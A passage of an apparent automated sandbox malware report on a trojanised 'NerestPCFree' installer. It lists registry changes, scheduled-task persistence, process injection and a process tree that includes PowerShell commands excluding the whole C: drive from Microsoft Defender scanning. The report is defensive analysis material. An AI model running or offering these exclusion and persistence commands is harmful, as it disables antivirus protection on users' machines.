2n6Sm8R3rd0k8GdcEC1hERRABZcZvbnOyLiVCWJiJpUy4HthcoWgZrjBXz2pF+q6CDRYsSX7rT9BBNamhSmUj9lrSNACmCA9VtqBo0M0TLAtRZeweAiszEoKI2Xococ4hDQUHjMe5xXUes0Tro78V4WJRNMf6RF8+rCdQto0AW0oHT6UXmJDJuCYfiUqJojaxSvMLS5cuZahUuvGcNtP6COJAWw8h/YRz+d5GcW7HZ+mxVnB00Fjn7o51M1nx1zUfME57IxA/oOXA3BIi4F4uOFqOedK11WAr9ojZqDJw2iOi+luH77ts57XZSTudAdInkaNQBjaBqH8TJWsqW6XuE+G49KyMveebtBB66J6iZriTdeJnsb13a8qkoVkHUZOuJa5uYUexgKfzsUfpET23qXY+n9ks7YI2T2MGwolQzAMOG+LKFuwgJcJtJsd9Mg4VVhUG1AXQeO/t9e1zx8f1kTKUBkIxWdgb1e5ZNN8gr0Sx8fcDOy4GiZ1oOx+mimsz0zfMZDmQ3Md2XgWYsqJCkkbxclNKSsSEjjborfFmODJP3owa1/u3U17MjjRa3mhCYkPf7oIDWzblgsBaDOsgDKqRFtpG5r9jEq5iSXWAa5LDk9lkQu/TCNInt7xbzZZacItS+k91Wl6wUQxlvbhyRk3qYO9yyy8nzKvRFy05C1cV+Fww1OhLLxkwUbvt6SYWLu/8XHJg33tpjnszKXws5155lJQ6IdmcFa4MUvO1LDxpjuCrt8cND66On2E6C19DLuHbmB8AfP+SKS2rhe3oDRMndDZHAvZqNb9NgeiqLpwlNq58KCUbY/eNbXY0ImNTYRcofaou64F3YKvjVlAetxOdo2c1yKlqutuS+2p+4qp+2FHLtcwJPKNQ1adbQbEUu8ZuETfYu1IvMt7pWRqQa2tH0ILvXAtG/RihGlbLATCRHL32EKT9QVu56lvwl4ZqKB0nIXertTkKTSlCFkR2lW9atBdLMWf89le8f6Im/4V/YOIRC0w302YXzfi30tDRwkXU6gZU1HfeD8VnmQE7TVB1IhcJdIMICf/cBgC/X4CkLBdGoS0Iqa6wZ+Mo7VvUpv43bLoLXyiz0XK0UrpuNHFVnOgZwUHcQomkraNEOaAGRK/+LRHln7dNppfI85q8T/F9/eEDZOgyrylwxkMhk8w1EMiOsGynuAxW0mghjwW/fUD+eivKFY7KY14fSlDmDYtzNgmmOK2sIsxPE699I951efA3Dhn9B/eZZ0k/ppwuseFx4y7o29H/xx+YCbk2E1zYDvTMebpiQhWaPPN41sAu4/VSLU7v8TasJFL8UCl62YqXSXLsDJN52WLqjFzYZPQSTL+oDHTZ0I0IoXNXVePYyJF26QvkrJSlcSVfTH+Pgx8zmzmmoO0kL9nZbD5bovR2gvj3qfj7VKVtbB0g+pI7AbJlaK7xt+NAAAAAK7riu3znOSFVOleRUFsM5kJ4yVp+YRtqgAlgwagVdoGfWppSQ5Rf8yo7eGRrQYspGQZPTkaGCpqlOGubdnFyeg=="	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3350944739-639801879-157714471-1000\02jjupzaogyqpeni\DeviceId = "<Data><User username=\"02JJUPZAOGYQPENI\"/></Data>\r\n"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3350944739-639801879-157714471-1000\ValidDeviceId	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02nuskzkuabdezag\DeviceId = "<Data LastUpdatedTime=\"1734195541\"><User username=\"02NUSKZKUABDEZAG\"><HardwareInfo BoundTime=\"1734195541\" TpmKeyStateClient=\"1\" TpmKeyStateServer=\"3\" LicenseKeySequence=\"1\" LicenseInstallError=\"0\" LicenseKeyVersion=\"2\"/></User></Data>\r\n"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3350944739-639801879-157714471-1000\02jjupzaogyqpeni\AppIdList = "{AFDA72BF-3409-413A-B54E-2AB8D66A7826};"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\ValidDeviceId = "02nuskzkuabdezag"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02nuskzkuabdezag\AppIdList = "{AFDA72BF-3409-413A-B54E-2AB8D66A7826};"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02nuskzkuabdezag\Provision Saturday, December 14, 2024 16:58:59 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAATEsmPOMyVkOonVeptikfaAAAAAACAAAAAAAQZgAAAAEAACAAAACNJ5vY9yKSIoitCTTo5nnyPGcqa4v3PDV9uU7aWvWutwAAAAAOgAAAAAIAACAAAAB5bqTDDqziKJkym/Sf73kUjDJqBgT2lFIx3vrYeJdeOSAAAABvp7qLbgHAYJ/QoHcxHiX084AkUVjQ6PkUfjDwdetvcEAAAABLTBlhYXn/KypSBSGWhXtd2bCVZRrW/cqt/jR/JQ8xUY7c7IiyF5BCfrzroWkVFgcHp7pJRX5UEQRL8qqlgr4o"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "00180012BAD7E2EA"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02hffkmccggumxty	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\DeviceLicenseUpdateFailureCount = "0"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	MpDefenderCoreService.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	MsServerHost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
624	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
4876	schtasks.exe
1700	schtasks.exe
940	schtasks.exe
3732	schtasks.exe
4852	schtasks.exe
3404	schtasks.exe
2864	schtasks.exe
4856	schtasks.exe
1164	schtasks.exe
2856	schtasks.exe
3660	schtasks.exe
1340	schtasks.exe
740	schtasks.exe
1452	schtasks.exe
1996	schtasks.exe
3380	schtasks.exe
4052	schtasks.exe
2884	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4052	twain32.exe
4052	twain32.exe
4036	powershell.exe
4036	powershell.exe
4052	twain32.exe
4052	twain32.exe
4052	twain32.exe
4052	twain32.exe
4052	twain32.exe
4052	twain32.exe
4052	twain32.exe
4052	twain32.exe
1228	dialer.exe
1228	dialer.exe
4284	powershell.exe
4284	powershell.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
4052	twain32.exe
4052	twain32.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe
1228	dialer.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3364	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4036	powershell.exe
Token: SeDebugPrivilege	1228	dialer.exe
Token: SeShutdownPrivilege	1704	powercfg.exe
Token: SeCreatePagefilePrivilege	1704	powercfg.exe
Token: SeShutdownPrivilege	816	powercfg.exe
Token: SeCreatePagefilePrivilege	816	powercfg.exe
Token: SeDebugPrivilege	4284	powershell.exe
Token: SeShutdownPrivilege	2264	powercfg.exe
Token: SeCreatePagefilePrivilege	2264	powercfg.exe
Token: SeShutdownPrivilege	1532	powercfg.exe
Token: SeCreatePagefilePrivilege	1532	powercfg.exe
Token: SeIncreaseQuotaPrivilege	4284	powershell.exe
Token: SeSecurityPrivilege	4284	powershell.exe
Token: SeTakeOwnershipPrivilege	4284	powershell.exe
Token: SeLoadDriverPrivilege	4284	powershell.exe
Token: SeSystemProfilePrivilege	4284	powershell.exe
Token: SeSystemtimePrivilege	4284	powershell.exe
Token: SeProfSingleProcessPrivilege	4284	powershell.exe
Token: SeIncBasePriorityPrivilege	4284	powershell.exe
Token: SeCreatePagefilePrivilege	4284	powershell.exe
Token: SeBackupPrivilege	4284	powershell.exe
Token: SeRestorePrivilege	4284	powershell.exe
Token: SeShutdownPrivilege	4284	powershell.exe
Token: SeDebugPrivilege	4284	powershell.exe
Token: SeSystemEnvironmentPrivilege	4284	powershell.exe
Token: SeRemoteShutdownPrivilege	4284	powershell.exe
Token: SeUndockPrivilege	4284	powershell.exe
Token: SeManageVolumePrivilege	4284	powershell.exe
Token: 33	4284	powershell.exe
Token: 34	4284	powershell.exe
Token: 35	4284	powershell.exe
Token: 36	4284	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	2540	svchost.exe
Token: SeIncreaseQuotaPrivilege	2540	svchost.exe
Token: SeSecurityPrivilege	2540	svchost.exe
Token: SeTakeOwnershipPrivilege	2540	svchost.exe
Token: SeLoadDriverPrivilege	2540	svchost.exe
Token: SeSystemtimePrivilege	2540	svchost.exe
Token: SeBackupPrivilege	2540	svchost.exe
Token: SeRestorePrivilege	2540	svchost.exe
Token: SeShutdownPrivilege	2540	svchost.exe
Token: SeSystemEnvironmentPrivilege	2540	svchost.exe
Token: SeUndockPrivilege	2540	svchost.exe
Token: SeManageVolumePrivilege	2540	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2540	svchost.exe
Token: SeIncreaseQuotaPrivilege	2540	svchost.exe
Token: SeSecurityPrivilege	2540	svchost.exe
Token: SeTakeOwnershipPrivilege	2540	svchost.exe
Token: SeLoadDriverPrivilege	2540	svchost.exe
Token: SeSystemtimePrivilege	2540	svchost.exe
Token: SeBackupPrivilege	2540	svchost.exe
Token: SeRestorePrivilege	2540	svchost.exe
Token: SeShutdownPrivilege	2540	svchost.exe
Token: SeSystemEnvironmentPrivilege	2540	svchost.exe
Token: SeUndockPrivilege	2540	svchost.exe
Token: SeManageVolumePrivilege	2540	svchost.exe
Token: SeIncreaseQuotaPrivilege	4284	powershell.exe
Token: SeSecurityPrivilege	4284	powershell.exe
Token: SeTakeOwnershipPrivilege	4284	powershell.exe
Token: SeLoadDriverPrivilege	4284	powershell.exe
Token: SeSystemProfilePrivilege	4284	powershell.exe
Token: SeSystemtimePrivilege	4284	powershell.exe
Token: SeProfSingleProcessPrivilege	4284	powershell.exe
Token: SeIncBasePriorityPrivilege	4284	powershell.exe

Suspicious use of FindShellTrayWindow 20 IoCs

pid	Process
2068	taskmgr.exe
2068	taskmgr.exe
2068	taskmgr.exe
2068	taskmgr.exe
2068	taskmgr.exe
2068	taskmgr.exe
2068	taskmgr.exe
2068	taskmgr.exe
2068	taskmgr.exe
2068	taskmgr.exe
2068	taskmgr.exe
2068	taskmgr.exe
2068	taskmgr.exe
3364	Explorer.EXE
3364	Explorer.EXE
2068	taskmgr.exe
2068	taskmgr.exe
2068	taskmgr.exe
2068	taskmgr.exe
2068	taskmgr.exe

Suspicious use of SendNotifyMessage 40 IoCs

pid	Process
2068	taskmgr.exe
2068	taskmgr.exe
2068	taskmgr.exe
2068	taskmgr.exe
2068	taskmgr.exe
2068	taskmgr.exe
2068	taskmgr.exe
2068	taskmgr.exe
2068	taskmgr.exe
2068	taskmgr.exe
2068	taskmgr.exe
2068	taskmgr.exe
2068	taskmgr.exe
2068	taskmgr.exe
2068	taskmgr.exe
2068	taskmgr.exe
3364	Explorer.EXE
3364	Explorer.EXE
3364	Explorer.EXE
3364	Explorer.EXE
3364	Explorer.EXE
3364	Explorer.EXE
3364	Explorer.EXE
3364	Explorer.EXE
3364	Explorer.EXE
3364	Explorer.EXE
3364	Explorer.EXE
3364	Explorer.EXE
3364	Explorer.EXE
3364	Explorer.EXE
3364	Explorer.EXE
3364	Explorer.EXE
3364	Explorer.EXE
3364	Explorer.EXE
3364	Explorer.EXE
3364	Explorer.EXE
3364	Explorer.EXE
3364	Explorer.EXE
2068	taskmgr.exe
2068	taskmgr.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1984	Conhost.exe
4788	Conhost.exe
1132	Conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4764 wrote to memory of 2660	4764	NerestPCFree 0.31.1.exe	83
PID 4764 wrote to memory of 2660	4764	NerestPCFree 0.31.1.exe	83
PID 4764 wrote to memory of 2660	4764	NerestPCFree 0.31.1.exe	83
PID 4764 wrote to memory of 4052	4764	NerestPCFree 0.31.1.exe	84
PID 4764 wrote to memory of 4052	4764	NerestPCFree 0.31.1.exe	84
PID 2660 wrote to memory of 992	2660	MpDefenderCoreService.exe	85
PID 2660 wrote to memory of 992	2660	MpDefenderCoreService.exe	85
PID 2660 wrote to memory of 992	2660	MpDefenderCoreService.exe	85
PID 1036 wrote to memory of 3452	1036	cmd.exe	91
PID 1036 wrote to memory of 3452	1036	cmd.exe	91
PID 1036 wrote to memory of 3408	1036	cmd.exe	92
PID 1036 wrote to memory of 3408	1036	cmd.exe	92
PID 1036 wrote to memory of 4388	1036	cmd.exe	93
PID 1036 wrote to memory of 4388	1036	cmd.exe	93
PID 1036 wrote to memory of 212	1036	cmd.exe	94
PID 1036 wrote to memory of 212	1036	cmd.exe	94
PID 1036 wrote to memory of 4760	1036	cmd.exe	95
PID 1036 wrote to memory of 4760	1036	cmd.exe	95
PID 4052 wrote to memory of 1228	4052	twain32.exe	98
PID 2756 wrote to memory of 1704	2756	cmd.exe	101
PID 2756 wrote to memory of 1704	2756	cmd.exe	101
PID 2756 wrote to memory of 816	2756	cmd.exe	102
PID 2756 wrote to memory of 816	2756	cmd.exe	102
PID 2756 wrote to memory of 2264	2756	cmd.exe	103
PID 2756 wrote to memory of 2264	2756	cmd.exe	103
PID 2756 wrote to memory of 1532	2756	cmd.exe	104
PID 2756 wrote to memory of 1532	2756	cmd.exe	104
PID 1228 wrote to memory of 596	1228	dialer.exe	5
PID 1228 wrote to memory of 672	1228	dialer.exe	7
PID 1228 wrote to memory of 952	1228	dialer.exe	12
PID 1228 wrote to memory of 64	1228	dialer.exe	13
PID 1228 wrote to memory of 448	1228	dialer.exe	14
PID 1228 wrote to memory of 1028	1228	dialer.exe	15
PID 1228 wrote to memory of 1044	1228	dialer.exe	16
PID 672 wrote to memory of 2484	672	lsass.exe	44
PID 1228 wrote to memory of 1052	1228	dialer.exe	17
PID 1228 wrote to memory of 1184	1228	dialer.exe	19
PID 1228 wrote to memory of 1196	1228	dialer.exe	20
PID 1228 wrote to memory of 1320	1228	dialer.exe	21
PID 1228 wrote to memory of 1328	1228	dialer.exe	22
PID 1228 wrote to memory of 1396	1228	dialer.exe	23
PID 672 wrote to memory of 2484	672	lsass.exe	44
PID 1228 wrote to memory of 1404	1228	dialer.exe	24
PID 1228 wrote to memory of 1412	1228	dialer.exe	25
PID 1228 wrote to memory of 1504	1228	dialer.exe	26
PID 1228 wrote to memory of 1544	1228	dialer.exe	27
PID 1228 wrote to memory of 1596	1228	dialer.exe	28
PID 1228 wrote to memory of 1672	1228	dialer.exe	29
PID 1228 wrote to memory of 1720	1228	dialer.exe	30
PID 1228 wrote to memory of 1780	1228	dialer.exe	31
PID 1228 wrote to memory of 1832	1228	dialer.exe	32
PID 1228 wrote to memory of 1896	1228	dialer.exe	33
PID 1228 wrote to memory of 1904	1228	dialer.exe	34
PID 1228 wrote to memory of 1924	1228	dialer.exe	35
PID 1228 wrote to memory of 1976	1228	dialer.exe	36
PID 1228 wrote to memory of 1004	1228	dialer.exe	37
PID 1228 wrote to memory of 1804	1228	dialer.exe	39
PID 1228 wrote to memory of 2184	1228	dialer.exe	40
PID 1228 wrote to memory of 2364	1228	dialer.exe	41
PID 1228 wrote to memory of 2372	1228	dialer.exe	42
PID 1228 wrote to memory of 2424	1228	dialer.exe	43
PID 1228 wrote to memory of 2484	1228	dialer.exe	44
PID 1228 wrote to memory of 2508	1228	dialer.exe	45
PID 1228 wrote to memory of 2532	1228	dialer.exe	46

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:596
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:64

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:448

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1028

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1044

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1052

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1184
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:3008
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  PID:3552

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1328

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1404

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1412

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1504

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1544
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2892

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1596

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1672

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1720

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1780

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1832

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1896

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1904

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1924

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1976

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1004

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:1804

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2184

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2372

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2424

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2484

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2508

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2540

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2556

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2924

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2840

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3356

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3364
- C:\Users\Admin\AppData\Local\Temp\NerestPC free\NerestPCFree 0.31.1.exe
  "C:\Users\Admin\AppData\Local\Temp\NerestPC free\NerestPCFree 0.31.1.exe"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4764
- - C:\Users\Admin\AppData\Local\Temp\MpDefenderCoreService.exe
    "C:\Users\Admin\AppData\Local\Temp\MpDefenderCoreService.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:2660
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\fontwin\rjeG9jpaqkoGYbXQiCixJVHPtViWeFHmB5.vbe"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      PID:992
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\fontwin\SCfgtLybPKjlpPh39WWFnP7oUkboktfnsRDnMjyFOdFfzldEyFoe.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1648
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        Suspicious use of SetWindowsHookEx
        
        PID:1984
      - C:\fontwin\MsServerHost.exe
        
        "C:\fontwin/MsServerHost.exe"
        6⤵
        Modifies WinLogon for persistence
        Checks computer location settings
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        Drops file in Windows directory
        Modifies registry class
        
        PID:1660
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lsdwy4t1\lsdwy4t1.cmdline"
        7⤵
        Drops file in System32 directory
        
        PID:2468
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4788
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCFC3.tmp" "c:\Windows\System32\CSC32FC33ECE203443ABA9072655949BF63.TMP"
        8⤵
        
        PID:5000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1360
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:1012
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4072
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:4736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3076
        
        C:\Windows\System32\Conhost.exe
        
